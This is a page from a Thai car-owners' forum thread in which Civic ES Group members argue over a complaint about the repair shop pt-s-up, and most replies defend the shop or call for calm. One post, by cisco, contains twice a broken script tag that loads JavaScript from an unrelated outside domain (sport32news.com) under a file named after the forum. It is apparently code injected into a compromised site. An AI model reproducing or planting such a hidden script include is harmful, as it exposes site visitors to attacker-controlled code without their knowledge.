อ่อเพิ่มเติมวันนั้นผมล้างเบรคด้วย ก็ดีมากครับ พอยกรถขึ้นพี่เขาก็บอกผมว่า ลูกยางปีกนก ประมาณนี้นะครับ ผมอาจจะจำผิด มันขาดนะครับ ผมเลยถามว่า แล้วอาการจะเป็นไงบ้างครับ เขาก็บอก ลงหลุมแล้ว กึ๊กๆๆๆ เลยแหละ อื่มมม ปัญหาที่ผมปวดหัวมานาน ก็ให้เขาแก้ เปลี่ยนยางสองข้าง ข้างละห้าร้อย จบครับ ขับรถออกมายิ้มมม เสียงหายหมด แค่ยางสองตัว ส่วนถ้าพวกคุณคิดว่าที่ไหนดีก็ทำครับ ก็เป็นเรื่องธรรมดา นี่ก็มุมผม


เจ็บปวดว่ะ...รู้สึกเหมือนหลายคนที่ให้คำแนะนำ โดนโยนขี้ใส่ยังไงไม่รู้ค่ะ

ถ้าเห็นว่า ในเว็บนี้เปนพี่เปนน้องกัน...
คุณคงไม่มาขึ้นหัวกระทู้ ให้หลายคนเสียความรู้สึกแบบนี้หรอกค่ะ

ขอโทษที่ต้องตอบอีกครั้ง
ไม่รู้ประเด็นจริงๆว่าคืออะไร...
ไปเพราะเชื่อ ไปเพราะคาดหวัง ไปและโม้
สุดท้ายพอไม่ใช่ ก้อเสียหน้าที่พูดไว้กับแฟน..????

อีกอย่าง อยากทำอะไรกับรถของคุณ
...เชิญค่ะ... ไม่ต้องสาธยาย ไม่มีใครอยากรู้เรื่องคุณหรอก

คุณมีหน้าที่การงานดี มีเงินเยอะ ไปเข้าศูนย์ดีๆ ดังๆ เถอะนะคะ
อย่ามาอู่เล็กๆ ไม่มีที่จอดรถ ไม่มีหัวหน้าศูนย์ ไม่มีคนเคลียร์คิวรถ ให้เสียอารมณ์เลย
โชคดีค่ะ

**อีกอย่าง ..หลายคนที่มาตอบกระทู้นี้..ฝนเชื่อว่า "เสียความรู้สึก" กับคุณจริงๆ**
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 14:30 - เสียความรู้สึกกับร้าน pt-s-up จริง
อ้าว...ชิ หาย ยาวเลยที่นี้
เอาเป็นว่า มาแชร์ประสบการณ์ที่เจอล่ะกันคับ
เห่อ....ผมก็เห็นใจอ่ะน่ะ ร่มๆ คับ เพื่อนๆ ES ทั้งหลาย ......กลายเป็นงั้นไป
ได้รับคำขอบคุณจาก: Rangsit 33  mai  kittidech  หัวเสีย  Winny  cisco  zan  kaorjang  ValuEs  NeaT ES.  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  K_series  hacker  soda_get  carrimoroll  Justinaen 
OTTO


ชื่อเล่น: ตู่

เข้าร่วม: 07 ตุลา 2008
ตอบ: 106

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 396
ให้คำขอบคุณ: 192

ที่อยู่: มีนบุรี
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 14:50 - เสียความรู้สึกกับร้าน pt-s-up จริง
chengg พิมพ์ว่า:
debuglogin พิมพ์ว่า:
จริงๆ ไม่เห็นต้องนั่งแก้ตัวแทนกันเลยนะครับ พวกคุณก็มีข้อมูล มีประสบการณ์ตามที่พวกคุณเจอกันมา ประสบการณ์ผมเจอมาแบบนี้ ผมเองเข้าเว็บนี้ทุกวันตั้งแต่ผมซื้อรถคันนี้มา โดยหวังว่าเป็นพี่เป็นน้องกัน หลายๆ ท่านที่ตอบกระทู้นี้ต่อว่าผมไว้เยอะ ผมจะไม่ตอบโต้อะไรพวกพี่นะครับ เพราะหลายๆ ท่านที่ว่า เวลารถผมมีปัญหาผมจำ display img พวกพี่ได้อะนะ พวกพี่ช่วยเหลือผมเป็นอย่างดี เอาเป็นว่านี่เป็นอะไรที่ผมเจอมา ตั้งแต่ครั้งแรก ถ้าผมไม่นึกถึงคำพูดพวกพี่ในบอร์ด ผมคงเปลี่ยนร้านไปแล้ว วันนั้นผมไปกับแฟน ระหว่างเดินทาง ผมบอกว่าร้านที่กำลังจะไปเป็นร้านที่เทพที่สุด โม้ไว้เยอะว่างั้น พอไปถึงร้านผมถึงกับหน้าเสียเหมือนกัน พูดยากครับเรื่องนี้ เอาเป็นว่าใครทำอะไรไว้กับใคร ก็น่าจะรู้ตัวนะครับ ส่วนตัวผมนอกจากงานประจำ ตอนนี้ทำธุรกิจทางไอทีอยู่ด้วย เพิ่งเริ่มต้นทำครับ ก็พอรู้บ้างว่ากลุ่มงานบริการ เราต้องทำกับลูกค้ายังไง ถึงแม้ว่าเราจะเป็นแบรนด์ที่ติดตลาดแล้วก็ตาม ไม่เป็นไรครับ รู้ว่างานพี่เขาเยอะคงไม่ง้อลูกค้าเป็นธรรมดา โดยเฉพาะรายเล็กอย่างผม ผมก็ทำที่อื่นแค่นั้นเอง เพราะผมก็เจอแล้วด้วยว่าที่ไหน ผมอยากจะเอามาแนะนำ แบ่งปันพวกคุณเท่านั้นเอง สำหรับคนที่ใจเหมือนผม คือถ้าพูดไม่ดี ก็ไม่ทำแล้ว เรื่องอื่นเป็นเรื่องรอง ผมเองเชื่อว่าเงินที่เราหามา เราควรจะซื้อบริการเค้าพร้อม และเต็มใจจะให้บริการครับ บางครั้งเรื่องพวกนี้มันก็ชนะงานขั้นเทพอย่างว่านะครับ จริงๆ วันนั้นผมจะเอาบิลไปขอเงินพี่เขาคืนแหละครับ เพราะผมต้องตั้งวาล์วใหม่หมดเลย เพราะเขาวัดแล้วไอที่ใช้เหล็กเีสียบๆ เขาบอกว่าตั้งวาล์วยัน และเขาแก้แค่นั้นจริงๆ แล้วตอนนี้รถผมก็ปกติแล้ว อ่อเพิ่มเติมวันนั้นผมล้างเบรคด้วย ก็ดีมากครับ พอยกรถขึ้นพี่เขาก็บอกผมว่า ลูกยางปีกนก ประมาณนี้นะครับ ผมอาจจะจำผิด มันขาดนะครับ ผมเลยถามว่า แล้วอาการจะเป็นไงบ้างครับ เขาก็บอก ลงหลุมแล้ว กึ๊กๆๆๆ เลยแหละ อื่มมม ปัญหาที่ผมปวดหัวมานาน ก็ให้เขาแก้ เปลี่ยนยางสองข้าง ข้างละห้าร้อย จบครับ ขับรถออกมายิ้มมม เสียงหายหมด แค่ยางสองตัว ส่วนถ้าพวกคุณคิดว่าที่ไหนดีก็ทำครับ ก็เป็นเรื่องธรรมดา นี่ก็มุมผม


เจ็บปวดว่ะ...รู้สึกเหมือนหลายคนที่ให้คำแนะนำ โดนโยนขี้ใส่ยังไงไม่รู้ค่ะ

ถ้าเห็นว่า ในเว็บนี้เปนพี่เปนน้องกัน...
คุณคงไม่มาขึ้นหัวกระทู้ ให้หลายคนเสียความรู้สึกแบบนี้หรอกค่ะ

ขอโทษที่ต้องตอบอีกครั้ง
ไม่รู้ประเด็นจริงๆว่าคืออะไร...
ไปเพราะเชื่อ ไปเพราะคาดหวัง ไปและโม้
สุดท้ายพอไม่ใช่ ก้อเสียหน้าที่พูดไว้กับแฟน..????

อีกอย่าง อยากทำอะไรกับรถของคุณ
...เชิญค่ะ... ไม่ต้องสาธยาย ไม่มีใครอยากรู้เรื่องคุณหรอก

คุณมีหน้าที่การงานดี มีเงินเยอะ ไปเข้าศูนย์ดีๆ ดังๆ เถอะนะคะ
อย่ามาอู่เล็กๆ ไม่มีที่จอดรถ ไม่มีหัวหน้าศูนย์ ไม่มีคนเคลียร์คิวรถ ให้เสียอารมณ์เลย
โชคดีค่ะ

**อีกอย่าง ..หลายคนที่มาตอบกระทู้นี้..ฝนเชื่อว่า "เสียความรู้สึก" กับคุณจริงๆ**



ไช่ครับ....ตรงประเด็นเลยครับ
อู่นี้ไม่มีอะไรดีเลย
1.ที่จอดรอซ่อมก็ไม่มี
2.หัวหน้าช่างก็ไม่รู้คนใหน
3.ช่างตัดสินใจเองไม่ได้ต้องรอถามเจ้าของอู่อย่างเดียว
4.เจ้าของอู่ชอบเอารถลูกค้าไปขับเล่น...โดยให้ลูกค้านั่งข้างๆ
5.โซฟานั่งรอก็ขาด...เวลาฝนตกก็สาด
6.เจ้าของอู่ขับรถตู้...ซื้อต่อจากอา..ชื่อผาด
7.บางวันหน้าอู่ชอบมีรถชนกันให้ดู
ไม่มีอะไรดีเลย....แต่ทำไมผมไปมาเกือบ 10 ครั้งหว่า
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 15:04 - เสียความรู้สึกกับร้าน pt-s-up จริง
ถ้ายังเข้ามาอ่านก็จงรู้ไว้ ครับ

จะมาว่าเหมารวมว่าเล่นพรรคเล่นพวก แบบนี้ ไม่ถูกต้องและครับ ในกระทู้ คนโพส ไม่ได้ รู้จักหน้าคร่า ตา กันหมด นะครับ

กระทู้ คุณ ตอบ หลายๆ หน้า หลายๆ โพส ยัง ไม่เข้าใจ อีก ว่า เค้าหมายความว่าไง หาว่าอู่ เค้าไม่สนใจ งุ้น งี้ ซะงั้น

ท่าน เทวดา ขอโทษเถอะ เข้าอู่ นะครับ ไม่ใช่ เข้า โรงแรม จะต้องมีพนักงานต้อนรับ โถ่ แหม

ได้รับคำขอบคุณจาก: soda_get  Rangsit 33  Winny  cisco  zan  kittidech  kaorjang  mai  ValuEs  aeae..  P@OW  jonatan  chengg  iMan  NeaT ES.  BOY_PeTiTe  sukhothai  honeybeex7  PAE KUNG  RG.KiD  musashi44  K_series  hacker  YINDEE  carrimoroll  monkey-es  Justinaen  nu_es_05 
toey_rx


เข้าร่วม: 08 ตุลา 2008
ตอบ: 290

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 386
ให้คำขอบคุณ: 23
ศุกร์, 16 กรกฎา 2010 15:06 - เสียความรู้สึกกับร้าน pt-s-up จริง
chengg พิมพ์ว่า:
debuglogin พิมพ์ว่า:
จริงๆ ไม่เห็นต้องนั่งแก้ตัวแทนกันเลยนะครับ พวกคุณก็มีข้อมูล มีประสบการณ์ตามที่พวกคุณเจอกันมา ประสบการณ์ผมเจอมาแบบนี้ ผมเองเข้าเว็บนี้ทุกวันตั้งแต่ผมซื้อรถคันนี้มา โดยหวังว่าเป็นพี่เป็นน้องกัน หลายๆ ท่านที่ตอบกระทู้นี้ต่อว่าผมไว้เยอะ ผมจะไม่ตอบโต้อะไรพวกพี่นะครับ เพราะหลายๆ ท่านที่ว่า เวลารถผมมีปัญหาผมจำ display img พวกพี่ได้อะนะ พวกพี่ช่วยเหลือผมเป็นอย่างดี เอาเป็นว่านี่เป็นอะไรที่ผมเจอมา ตั้งแต่ครั้งแรก ถ้าผมไม่นึกถึงคำพูดพวกพี่ในบอร์ด ผมคงเปลี่ยนร้านไปแล้ว วันนั้นผมไปกับแฟน ระหว่างเดินทาง ผมบอกว่าร้านที่กำลังจะไปเป็นร้านที่เทพที่สุด โม้ไว้เยอะว่างั้น พอไปถึงร้านผมถึงกับหน้าเสียเหมือนกัน พูดยากครับเรื่องนี้ เอาเป็นว่าใครทำอะไรไว้กับใคร ก็น่าจะรู้ตัวนะครับ ส่วนตัวผมนอกจากงานประจำ ตอนนี้ทำธุรกิจทางไอทีอยู่ด้วย เพิ่งเริ่มต้นทำครับ ก็พอรู้บ้างว่ากลุ่มงานบริการ เราต้องทำกับลูกค้ายังไง ถึงแม้ว่าเราจะเป็นแบรนด์ที่ติดตลาดแล้วก็ตาม ไม่เป็นไรครับ รู้ว่างานพี่เขาเยอะคงไม่ง้อลูกค้าเป็นธรรมดา โดยเฉพาะรายเล็กอย่างผม ผมก็ทำที่อื่นแค่นั้นเอง เพราะผมก็เจอแล้วด้วยว่าที่ไหน ผมอยากจะเอามาแนะนำ แบ่งปันพวกคุณเท่านั้นเอง สำหรับคนที่ใจเหมือนผม คือถ้าพูดไม่ดี ก็ไม่ทำแล้ว เรื่องอื่นเป็นเรื่องรอง ผมเองเชื่อว่าเงินที่เราหามา เราควรจะซื้อบริการเค้าพร้อม และเต็มใจจะให้บริการครับ บางครั้งเรื่องพวกนี้มันก็ชนะงานขั้นเทพอย่างว่านะครับ จริงๆ วันนั้นผมจะเอาบิลไปขอเงินพี่เขาคืนแหละครับ เพราะผมต้องตั้งวาล์วใหม่หมดเลย เพราะเขาวัดแล้วไอที่ใช้เหล็กเีสียบๆ เขาบอกว่าตั้งวาล์วยัน และเขาแก้แค่นั้นจริงๆ แล้วตอนนี้รถผมก็ปกติแล้ว อ่อเพิ่มเติมวันนั้นผมล้างเบรคด้วย ก็ดีมากครับ พอยกรถขึ้นพี่เขาก็บอกผมว่า ลูกยางปีกนก ประมาณนี้นะครับ ผมอาจจะจำผิด มันขาดนะครับ ผมเลยถามว่า แล้วอาการจะเป็นไงบ้างครับ เขาก็บอก ลงหลุมแล้ว กึ๊กๆๆๆ เลยแหละ อื่มมม ปัญหาที่ผมปวดหัวมานาน ก็ให้เขาแก้ เปลี่ยนยางสองข้าง ข้างละห้าร้อย จบครับ ขับรถออกมายิ้มมม เสียงหายหมด แค่ยางสองตัว ส่วนถ้าพวกคุณคิดว่าที่ไหนดีก็ทำครับ ก็เป็นเรื่องธรรมดา นี่ก็มุมผม


เจ็บปวดว่ะ...รู้สึกเหมือนหลายคนที่ให้คำแนะนำ โดนโยนขี้ใส่ยังไงไม่รู้ค่ะ

ถ้าเห็นว่า ในเว็บนี้เปนพี่เปนน้องกัน...
คุณคงไม่มาขึ้นหัวกระทู้ ให้หลายคนเสียความรู้สึกแบบนี้หรอกค่ะ

ขอโทษที่ต้องตอบอีกครั้ง
ไม่รู้ประเด็นจริงๆว่าคืออะไร...
ไปเพราะเชื่อ ไปเพราะคาดหวัง ไปและโม้
สุดท้ายพอไม่ใช่ ก้อเสียหน้าที่พูดไว้กับแฟน..????

อีกอย่าง อยากทำอะไรกับรถของคุณ
...เชิญค่ะ... ไม่ต้องสาธยาย ไม่มีใครอยากรู้เรื่องคุณหรอก

คุณมีหน้าที่การงานดี มีเงินเยอะ ไปเข้าศูนย์ดีๆ ดังๆ เถอะนะคะ
อย่ามาอู่เล็กๆ ไม่มีที่จอดรถ ไม่มีหัวหน้าศูนย์ ไม่มีคนเคลียร์คิวรถ ให้เสียอารมณ์เลย
โชคดีค่ะ

**อีกอย่าง ..หลายคนที่มาตอบกระทู้นี้..ฝนเชื่อว่า "เสียความรู้สึก" กับคุณจริงๆ**



ใช่ งานดีเงินเยอะไม่ใช่หรอครับ ทำไม ต้องไปนั่ง ทำที่ ร้านพี่เค้าละ
ถ้าต้องการ ความสะดวกสบาย เชิญที่อื่น ถ้าต้องการคุณภาพ เชิญทางนี้
ทุกท่าน ที่ไปที่ร้าน ต้องการไปทำรถ ไม่ใช่ไปนั่งกิน กาแฟเหมือน ร้าน Starbucks
ได้รับคำขอบคุณจาก: Rangsit 33  Winny  cisco  zan  kittidech  mai  kaorjang  ValuEs  jonatan  chengg  BOY_PeTiTe  sukhothai  honeybeex7  PAE KUNG  RG.KiD  musashi44  K_series  hacker  YINDEE  fff_1232  carrimoroll  nu_es_05 
13112D


ชื่อเล่น: เบิร์ด

เข้าร่วม: 18 พฤศจิกา 2009
ตอบ: 148

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 170
ให้คำขอบคุณ: 33

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 15:14 - เสียความรู้สึกกับร้าน pt-s-up จริง
ขออีกครั้งนะครับ คือผมว่าเราเลิกพูดถึง กันดีกว่าครับเพราะดูแล้วเริ่มจะใช้คำพูด ... ใส่กันแรงขึ้นอะครับ ผมไม่อยากให้ที่แห่งนี้เป็นอย่างอื่น นอนจากที่รวมของเราชาว ES แลกเปลี่ยนความรู้ ถึงผมจะมาไม่นานแต่รู้สึกภูมิใจใน ES GROUP ทางออกคือให้เรื่องจบๆ ไปเหอะครับ ส่วนพี่ก็หาร้านใกล้ๆ และที่คิดว่าสะดวกลองทำดู อาจจะเจอร้านที่ถูกใจและใกล้บ้านก็ได้ครับ
ทุกอย่างอาจเกิดจากความเข้าใจผิดกัน และอยากจะขอให้รู้จักคำว่า อภัย ทุกอย่างจะได้จบ และเป็นเหมือนเดิมครับ เพื่อ ES ของเราครับ
ได้รับคำขอบคุณจาก: Winny  soda_get  zan  kittidech  kaorjang  ValuEs  jonatan  chengg  BOY_PeTiTe  kunshybeer08  sukhothai  RG.KiD  musashi44  myoatty57  numixer  carrimoroll  Justinaen 
mai


เข้าร่วม: 29 ตุลา 2008
ตอบ: 1053

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1855
ให้คำขอบคุณ: 3332
ศุกร์, 16 กรกฎา 2010 15:38 - เสียความรู้สึกกับร้าน pt-s-up จริง
Thanks to all other concerns and are open minded to all customer feedback to develop.
But for a customer to understand the import symptoms car repair technicians, with reason.
soda_get


ชื่อเล่น: เก๊ต

เข้าร่วม: 30 กันยา 2008
ตอบ: 520

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2286
ให้คำขอบคุณ: 2290

ที่อยู่: RSZ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 16 กรกฎา 2010 15:43 - เสียความรู้สึกกับร้าน pt-s-up จริง
mai พิมพ์ว่า:
Thanks to all other concerns and are open minded to all customer feedback to develop.
But for a customer to understand the import symptoms car repair technicians, with reason.


สุดยอดมาก เย็นนี้เจอกันครับ
ได้รับคำขอบคุณจาก: Rangsit 33  kittidech  kaorjang  mai  jonatan  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  SuNsHirO_!!  hacker  carrimoroll 
cisco


ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
ศุกร์, 16 กรกฎา 2010 15:46 - เสียความรู้สึกกับร้าน pt-s-up จริง
mai พิมพ์ว่า:
Thanks to all other concerns and are open minded to all customer feedback to develop.
But for a customer to understand the import symptoms car repair technicians, with reason.


แอบเอาไปแปลใน google <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ได้รับคำขอบคุณจาก: kittidech  kaorjang  mai  jonatan  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  hacker  carrimoroll 
zan


เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

ที่อยู่: HNC
ศุกร์, 16 กรกฎา 2010 15:48 - เสียความรู้สึกกับร้าน pt-s-up จริง
mai พิมพ์ว่า:
Thanks to all other concerns and are open minded to all customer feedback to develop.
But for a customer to understand the import symptoms car repair technicians, with reason.


โค่ดจะแมน
ได้รับคำขอบคุณจาก: kittidech  kaorjang  mai  jonatan  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  hacker  carrimoroll 
earnee33


ชื่อเล่น: เอิร์น

เข้าร่วม: 08 เมษา 2010
ตอบ: 1349

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1428
ให้คำขอบคุณ: 584

ที่อยู่: โคราช-ปราจีน-บุรีรัมย์
ปี: 2004
ศุกร์, 16 กรกฎา 2010 15:48 - เสียความรู้สึกกับร้าน pt-s-up จริง
ระวัง จะเจอ ลากกระทู้ ไปเป็น ดราม่า
ได้รับคำขอบคุณจาก: kittidech  kaorjang  mai  jonatan  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  hacker  carrimoroll 
naponghp


ชื่อเล่น: หนึ่ง

เข้าร่วม: 27 พฤษภาคม 2009
ตอบ: 782

Moderator
Moderator

ได้รับคำขอบคุณ: 1032
ให้คำขอบคุณ: 1318

ที่อยู่: Samutprakarn - Sukothai - Homepro Anywhere
ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 16 กรกฎา 2010 15:49 - เสียความรู้สึกกับร้าน pt-s-up จริง
soda_get พิมพ์ว่า:
mai พิมพ์ว่า:
Thanks to all other concerns and are open minded to all customer feedback to develop.
But for a customer to understand the import symptoms car repair technicians, with reason.


สุดยอดมาก เย็นนี้เจอกันครับ



ไปไหนกันหว่า
ได้รับคำขอบคุณจาก: kittidech  kaorjang  mai  jonatan  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  hacker  carrimoroll 
Kumaro


เข้าร่วม: 08 มกรา 2010
ตอบ: 131

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 181
ให้คำขอบคุณ: 114

ที่อยู่: จันทรเกษม-โชคชัย4-ลาดพร้าว71
ศุกร์, 16 กรกฎา 2010 16:46 - เสียความรู้สึกกับร้าน pt-s-up จริง
ทุกคนคับทำหน้าแบบนี้ แล้วจะดีขึ้นคับ
ได้รับคำขอบคุณจาก: mai  zan  BOY_PeTiTe  sukhothai  kaorjang  cisco  RG.KiD  kittidech  musashi44  jonatan  hacker  psYchosis  soda_get  fff_1232  carrimoroll 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 3 จาก 9
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...